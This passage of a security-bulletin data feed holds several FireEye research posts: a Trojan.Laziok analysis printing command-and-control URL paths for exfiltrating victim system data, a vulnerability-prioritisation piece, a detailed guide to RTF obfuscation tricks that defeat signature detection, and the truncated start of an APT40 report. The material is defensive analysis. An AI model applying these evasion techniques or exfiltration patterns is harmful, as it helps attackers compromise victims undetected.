EDX,21279964.00414277 ASCII \"&avname=\" \n004065AF MOV EDX,21279964.00416BFC ASCII \"&parefire=\" \n004065D0 MOV EDX,21279964.0041474A ASCII \"&install=\" \n004065E5 MOV EDX,21279964.00414E12 ASCII \"&gpu=\" \n00406606 MOV EDX,21279964.004164B7 ASCII \"&cpu=\" \n00406659 MOV EDX,21279964.004170F9 ASCII \"bkill.php\" \n004066B9 MOV EDX,21279964.00415B79 ASCII \"0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75\" \n004066ED MOV EDX,21279964.004149CD ASCII \"install_info.php\" \n00406735 MOV EDX,21279964.00415951 ASCII \"pinginfo.php\" \n00406772 MOV EDX,21279964.00416B6B ASCII \"get.php?IP=\" \n00406787 MOV EDX,21279964.0041463F ASCII \"&COMPUTER=\" \n0040679C MOV EDX,21279964.00416DF5 ASCII \"&OS=\" \n004067B1 MOV EDX,21279964.00415CB8 ASCII \"&COUNTRY=\" \n004067C6 MOV EDX,21279964.00416069 ASCII \"&HWID=\" \n004067DB MOV EDX,21279964.00414740 ASCII \"&INSTALL=\" \n004067F0 MOV EDX,21279964.00415BE3 ASCII \"&PING=\" \n00406805 MOV EDX,21279964.004158E2 ASCII \"&INSTAL=\" \n0040681A MOV EDX,21279964.00414D3E ASCII \"&V=\" \n0040682F MOV EDX,21279964.00414E5D ASCII \"&Arch=\" \n00406872 MOV EDX,21279964.00414166 ASCII \"post.php\" \n00406899 MOV EDX,21279964.00414EB0 ASCII \"*0\"\n\nAbove instructions of the payload, when unpacked, highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to well-known folders and processes such as:\n\nC:\\Documents and Settings\\admin\\Application Data\\System\\Oracle\\smss.exe\n\nThe payload attempts to call back to a known bad Polish server [hxxp://]193.189.117[.]36]\n\nWe observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google\u2019s security checks. Following our notification, Google promptly removed the malicious file and it can no longer be fetched.\n\n##### **Conclusion**\n\nFireEye\u2019s multi-flow detection mechanism catches this at every level, from the point of entry to the callback \u2013 and the malware is not able to bypass FireEye sandbox security. PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful regarding the policy and regulation of PowerShell usage \u2013 especially since the abuse can involve some trusted sources that sometimes have exemptions, with whitelists from some security vendors being one example. Or they can keep using FireEye. \n\n\n[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector \n[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ \n[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html\n", "edition": 2, "cvss3": {}, "published": "2016-04-21T13:45:00", "type": "fireeye", "title": "PowerShell used for spreading Trojan.Laziok through Google Docs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2012-0158"], "modified": "2016-04-21T13:45:00", "id": "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "href": "https://www.fireeye.com/blog/threat-research/2016/04/powershell_used_for.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T16:41:57", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations._\n\nOrganizations often have to make difficult choices when it comes to patch prioritization. Many are faced with securing complex network infrastructure with thousands of systems, different operating systems, and disparate geographical locations. Even when armed with a simplified vulnerability rating system, it can be hard to know where to start. This problem is compounded by the ever-changing threat landscape and increased access to zero-days.\n\nAt FireEye, we apply the rich body of knowledge accumulated over years of global intelligence collection, incident response investigations, and device detections, to help our customers defend their networks. This understanding helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations. \n\nIn this blog post, we\u2019ll demonstrate how we apply intelligence to help organizations assess risk and make informed decisions about vulnerability management and patching in their environments.\n\n#### Functions of Vulnerability Intelligence\n\nVulnerability intelligence helps clients to protect their organizations, assets, and users in three main ways:\n\n \nFigure 1: Vulnerability intelligence can help with risk assessment and informed decision making\n\n#### Tailoring Vulnerability Prioritization\n\nWe believe it is important for organizations to build a defensive strategy that prioritizes the types of threats that are most likely to impact their environment, and the threats that could cause the most damage. When organizations have a clear picture of the spectrum of threat actors, malware families, campaigns, and tactics that are most relevant to their organization, they can make more nuanced prioritization decisions when those threats are linked to exploitation of vulnerabilities. A lower risk vulnerability that is actively being exploited in the wild against your organization or similar organizations likely has a greater potential impact to you than a vulnerability with a higher rating that is not actively being exploited.\n\n \nFigure 2: Patch Prioritization Philosophy\n\n#### Integration of Vulnerability Intelligence in Internal Workflows\n\nBased on our experience assisting organizations globally with enacting intelligence-led security, we outline three use cases for integrating vulnerability intelligence into internal workflows.\n\n \nFigure 3: Integration of vulnerability intelligence into internal workflows\n\n**Tools and Use Cases for Operationalizing Vulnerability Intelligence**\n\n_1\\. Automate Processes by Fusing Intelligence with Internal Data_\n\nAutomation is valuable to security teams with limited resources. Similar to automated detecting and blocking of indicator data, vulnerability threat intelligence can be automated by merging data from internal vulnerability scans with threat intelligence (via systems like the Mandiant [Intelligence API](<https://www.fireeye.com/solutions/cyber-threat-intelligence/threat-intelligence-subscriptions/intelligence-api.html>)) and aggregated into a SIEM, Threat Intelligence Platform, and/or ticketing system. This enhances visibility into various sources of both internal and external data with vulnerability intelligence providing risk ratings and indicating which vulnerabilities are being actively exploited. FireEye also offers a custom tool called FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d), described in more detail below for quickly correlating vulnerabilities found in logs and scans with Mandiant ratings.\n\nSecurity teams can similarly automate communication and workflow tracking processes using threat intelligence by defining rules for auto-generating tickets based on certain combinations of Mandiant risk and exploitation ratings; for example, internal service-level-agreements (SLAs) could state that \u2018high\u2019 risk vulnerabilities that have an exploitation rating of \u2018available,\u2019 \u2018confirmed,\u2019 or \u2018wide\u2019 must be patched within a set number of days. Of course, the SLA will depend on the company\u2019s operational needs, the capability of the team that is advising the patch process, and executive buy-in to the SLA process. Similarly, there may be an SLA defined for patching vulnerabilities that are of a certain age. Threat intelligence tells us that adversaries continue to use older vulnerabilities as long as they remain effective. For example, as recently as January 2020, we observed a Chinese cyber espionage group use an exploit for CVE-2012-0158, a Microsoft Office stack-based buffer overflow vulnerability originally released in 2012, in malicious email attachments to target organizations in Southeast Asia. Automating the vulnerability-scan-to-vulnerability-intelligence correlation process can help bring this type of issue to light. \n\nAnother potential use case employing automation would be incorporating vulnerability intelligence as security teams are testing updates or new hardware and software prior to introduction into the production environment. This could dramatically reduce the number of vulnerabilities that need to be patched in production and help prioritize those vulnerabilities that need to be patched first based on your organization\u2019s unique threat profile and business operations.\n\n_2\\. Communicating with Internal Stakeholders_\n\nTeams can leverage vulnerability reporting to send internal messaging, such as flash-style notifications, to alert other teams when Mandiant rates a vulnerability known to impact your systems high or critical. These are the vulnerabilities that should take priority in patching and should be patched outside of the regular cycle.\n\nData-informed intelligence analysis may help convince stakeholders outside of the security organization the importance of patching quickly, even when this is inconvenient to business operations. Threat Intelligence can inform an organization\u2019s appropriate use of resources for security given the potential business impact of security incidents.\n\n_3\\. Threat Modeling_\n\nOrganizations can leverage vulnerability threat intelligence to inform their threat modeling to gain insight into the most likely threats to their organization, and better prepare to address threats in the mid to long term. Knowledge of which adversaries pose the greatest threat to your organization, and then knowledge of which vulnerabilities those threat groups are exploiting in their operations, can enable your organization to build out security controls and monitoring based on those specific CVEs.\n\n#### Examples\n\nThe following examples illustrate workflows supported by vulnerability threat intelligence to demonstrate how organizations can operationalize threat intelligence in their existing security teams to automate processes and increase efficiency given limited resources.\n\n_Example 1: Using FIVE for Ad-hoc Vulnerability Prioritization_\n\nThe FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d) tool is available for customers [here](<https://fireeye.market/apps?query=five>). It is available for MacOS and Windows, requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration.\n\n \nFigure 4: FIVE Tool for Windows and MacOS\n\nIn this scenario, an organization\u2019s intelligence team was asked to quickly identify any vulnerability that required patching from a server vulnerability scan after that server was rebuilt from a backup image. The intelligence team was presented with a text file containing a list of CVE numbers. Users can drag-and-drop a text readable file (CSV, TEXT, JSON, etc.) into the FIVE tool and the CVE numbers will be discovered from the file using regex. As shown in Figure 6 (below), in this example, the following vulnerabilities were found in the file and presented to the user. \n\n \nFigure 5: FIVE tool startup screen waiting for file input\n\n \nFigure 6: FIVE tool after successfully regexing the CVE-IDs from the file\n\nAfter selecting all CVE-IDs, the user clicked the \u201cFetch Vulnerabilities\u201d button, causing the application to make the necessary two-stage API call to the Intelligence API.\n\nThe output depicted in Figure 7 shows the user which vulnerabilities should be prioritized based on FireEye\u2019s risk and exploitation ratings. The red and maroon boxes indicate vulnerabilities that require attention, while the yellow indicate vulnerabilities that should be reviewed for possible action. Details of the vulnerabilities are displayed below, with associated intelligence report links providing further context.\n\n \nFigure 7: FIVE tool with meta-data, CVE-IDs, and links to related Intelligence Reports\n\nFIVE can also facilitate other use cases for vulnerability intelligence. For example, this chart can be attached in messaging to other internal stakeholders or executives for review, as part of a status update to provide visibility on the organization\u2019s vulnerability management program.\n\n_Example 2: Vulnerability Prioritization, Internal Communications, Threat Modeling_\n\nCVE-2019-19781 is a vulnerability affecting Citrix that Mandiant Threat Intelligence rated critical. Mandiant discussed early exploitation of this vulnerability in a January 2020 blog post. We continued to monitor for additional exploitation, and informed our clients when we observed exploitation by ransomware operators and Chinese espionage group, APT41.\n\nIn cases like these, threat intelligence can help impacted organizations find the \u201csignal\u201d in the \u201cnoise\u201d and prioritize patching using knowledge of exploitation and the motives and targeting patterns of threat actors behind the exploitation. Enterprises can use intelligence to inform internal stakeholders of the potential risk and provide context as to the potential business and financial impact of a ransomware infection or an intrusion by a highly resourced state sponsored group. This support the immediate patch prioritization decision while simultaneously emphasizing the value of a holistically informed security organization.\n\n_Example 3: Intelligence Reduces Unnecessary Resource Expenditure \u2014 Automating Vulnerability Prioritization and Communications_\n\nAnother common application for vulnerability intelligence is informing security teams and stakeholders when to stand down. When a vulnerability is reported in the media, organizations often spin up resources to patch as quickly as possible. Leveraging threat intelligence in security processes help an organization discern when it is necessary to respond in an all-hands-on-deck manner.\n\nTake the case of the [CVE-2019-12650](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12650>), originally disclosed on Sept. 25, 2019 with an NVD rating of \u201cHigh.\u201d Without further information, an organization relying on this score to determine prioritization may include this vulnerability in the same patch cycle along with numerous other vulnerabilities rated High or Critical. As previously discussed, we have experts review the vulnerability and determine that it required the highest level of privileges available to successfully exploit, and there was no evidence of exploitation in the wild.\n\nThis is a case where threat intelligence reporting as well as automation can effectively minimize the need to unnecessarily spin up resources. Although the public NVD score rated this vulnerability high, Mandiant Intelligence rated it as \u201clow\u201d risk due to the high level of privileges needed to use it and lack of exploitation in the wild. Based on this assessment, organizations may decide that this vulnerability could be patched in the regular cycle and does not necessitate use of additional resources to patch out-of-band. When Mandiant ratings are automatically integrated into the patching ticket generation process, this can support efficient prioritization. Furthermore, an organization could use the analysis to issue an internal communication informing stakeholders of the reasoning behind lowering the prioritization.\n\n#### Vulnerabilities: Managed\n\nBecause we have been closely monitoring vulnerability exploitation trends for years, we were able to distinguish when attacker use of zero-days evolved from use by a select class of highly skilled attackers, to becoming accessible to less skilled groups with enough money to burn. Our observations consistently underscore the speed with which attackers exploit useful vulnerabilities, and the lack of exploitation for vulnerabilities that are hard to use or do not help attackers fulfill their objectives. Our understanding of the threat landscape helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations.\n\nMandiant Threat Intelligence enables organizations to implement a defense-in-depth approach to holistically mitigate risk by taking all feasible steps\u2014not just patching\u2014to prevent, detect, and stymie attackers at every stage of the attack lifecycle with both technology and human solutions.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n\n**Additional Resources**\n\nZero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill \u2014 Intelligence for Vulnerability Management, Part One\n\nThink Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part Two\n\nSeparating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities \u2014 Intelligence for Vulnerability Management, Part Three\n\nMandiant offers [Intelligence Capability Development (ICD) services](<https://www.fireeye.com/solutions/cyber-threat-intelligence.html>) to help organizations optimize their ability to consume, analyze and apply threat intelligence.\n\nThe [FIVE tool is available on the FireEye Market](<https://fireeye.market/apps?query=five>). It requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration. Please contact your Intelligence Enablement Manager or FireEye Support to obtain API keys. \n\nMandiant's OT Asset Vulnerability Assessment Service informs customers of relevant vulnerabilities by matching a customer's asset list against vulnerabilities and advisories. Relevant vulnerabilities and advisories are delivered in a report from as little as once a year, to as often as once a week. Additional add-on services such as asset inventory development and deep dive analysis of critical assets are available. Please contact your Intelligence Enablement Manager for more information.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-27T12:30:00", "type": "fireeye", "title": "Putting the Model to Work: Enabling Defenders With Vulnerability\nIntelligence \u2014 Intelligence for Vulnerability Management, Part Four", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12650", "CVE-2019-19781", "CVE-2012-0158"], "modified": "2020-04-27T12:30:00", "id": "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "href": "https://www.fireeye.com/blog/threat-research/2020/04/enabling-defenders-with-vulnerability-intelligence.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-17T14:44:05", "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n\n\n\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n\n\nFigure 1. Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. Instead, the control word or parameter will be terminated.\n\n\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. \n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \n\\par is a known control word that does not accept any data. RTF parser will skip the control word and only the data that follows remains.\n\n2.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nRTF parser can also recognize \\datastore and understand that it can accept data, therefore the following data will be consumed by \\datastore.\n\n3.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed by lpolestream contains a pointer to OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF Parser:\n\n\n\nThe last command .writemem writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images, it seems there is no obvious technique as OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "edition": 2, "cvss3": {}, "published": "2016-05-20T14:59:00", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "modified": "2016-05-20T14:59:00", "id": "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-02T10:01:23", "description": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40. The actor has conducted operations since at least 2013 in support of China\u2019s naval modernization effort. The group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies. More recently, we have also observed specific targeting of countries strategically important to the Belt and Road Initiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom. This China-nexus cyber espionage group was previously reported as TEMP.Periscope and TEMP.Jumper.\n\n#### Mission\n\nIn December 2016, China\u2019s People Liberation Army Navy (PLAN) seized a U.S. Navy unmanned underwater vehicle (UUV) operating in the South China Sea. The incident paralleled China\u2019s actions in cyberspace; within a year APT40 was observed masquerading as a UUV manufacturer, and targeting universities engaged in naval research. That incident was one of many carried out to acquire advanced technology to support the development of Chinese naval capabilities. We believe APT40\u2019s emphasis on maritime issues and naval technology ultimately support China\u2019s ambition to establish a blue-water navy.\n\nIn addition to its maritime focus, APT40 engages in broader regional targeting against traditional intelligence targets, especially organizations with operations in Southeast Asia or involved in South China Sea disputes. Most recently, this has included [victims with connections to elections](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) in Southeast Asia, which is likely driven by events affecting China\u2019s Belt and Road 